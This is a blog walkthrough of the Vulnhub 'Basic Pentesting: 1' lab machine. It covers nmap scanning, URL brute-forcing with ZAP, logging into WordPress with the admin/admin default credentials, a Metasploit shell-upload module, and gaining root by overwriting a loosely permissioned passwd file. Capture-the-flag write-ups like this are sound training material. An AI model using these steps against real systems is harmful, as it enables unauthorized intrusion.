Basic Pentesting: 1 Walkthrough — Vulnhub

Syscall59
Syscall59
Mar 23, 2018 · 4 min read

This time I’m focusing on another little-widdle challenge aimed at 3̶1̶3̶3̶7̶ ̶H̶4̶x̶0̶r̶z ̶ beginners:

So, let’s hit the gas with an nmap scan. We are using the following command:

nmap -p- -sS -Pn -n -vvv -oA nmap-host-ports 192.168.1.5

Now, what do all those options mean?

-p-    Scan all ports (Actually 1 to 65535, port 0 is not scanned)
-sS Perform SYN scan (A sort-of stealth scan)
-Pn All the hosts will be scanned without exception
-n Skip DNS resolution
-vvv Be super verbose and show ports and hosts as you find them
-oA Save the output to all the available formats (just in case)

And here is what we got:

So we have 3 services running on this machine. Now let’s gather more in-depth info about the OS and the services:

This time the command includes just the ports we know are running services and the following options:

-O    OS detection
-sV Service version scan

After having read the results from the scan I go for the http service first. On the browser I see this:

That’s the default page for the server. This site is not being maintained for sure!

As I don’t see anything interesting on that page I now use ZAP to do a dictionary attack trying to find valid URLs within 192.168.1.5:80. After a couple of minutes I find 192.168.1.5:80/secret :

This “secret” page looks pretty messy!!

I start looking for clues here and, eventually, I find the reason why this looks like that: all the links of the blog refer to a domain called “vtcsec” but it seems to be down. Maybe this machine was meant to be “vtcsec” host. So, in order to see the blog with all it’s content being loaded properly I can add an entry for vtcsec on my hosts file and try again:

Now, let’s give it a shot!

This looks much better now!

So by now I’m running spider on ZAP and trying to guess some valid URLs. Luckily for me this is a Wordpress blog (as you can clearly read on the last image) and the default login URL is available. And… you know what are the credentials for the admin account? admin/admin.

Now that we have admin access on the Wordpress site we can use metaspolit to generate a plugin that will spawn a shell when invoked. The module is called wp_admin_shell_upload (pretty self explanatory). Here’s a screenshot of the exact options I used:

Once inside the box I check the privileges that I have and look for interesting files:

Using unix-privesc-check script we can auto-magically check for privileges miss-configurations :

Sadly, this machine has loose permissions for the passwd file. This allows us to download the passwd file to our machine, modify the root password and upload the modified version of the file replacing the original thus gaining root access:

Hope you enjoyed this one! Until next time


syscall59

Shellcode for the masses

Syscall59

Written by

Syscall59

Twitter: @syscall59 | medium.syscall59.com | syscall59@protonmail.com

syscall59

syscall59

Shellcode for the masses

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade